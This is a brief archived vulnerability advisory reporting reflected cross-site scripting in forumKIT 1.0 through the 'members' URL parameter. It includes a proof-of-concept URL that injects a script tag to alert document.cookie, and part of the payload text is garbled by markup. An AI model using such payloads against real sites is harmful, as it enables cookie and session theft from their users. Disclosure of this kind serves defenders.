TUCoPS :: Web BBS :: etc :: hack7023.htm

ForumKIT XSS
XSS Vulnerability in ForumKIT



Vulnerable System :

forumKIT 1.0



Description : 

an XSS is founded in the variable members that have the value 'true'

you can exchange it with XSS Code .



exploit : 

<script>alert(document">http://forum.target.com/f.aspx?members="><script>alert(document. cookie);</script>



this exploit is discovered by : neO

e-mail : al_modamer@hotmail.com 

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH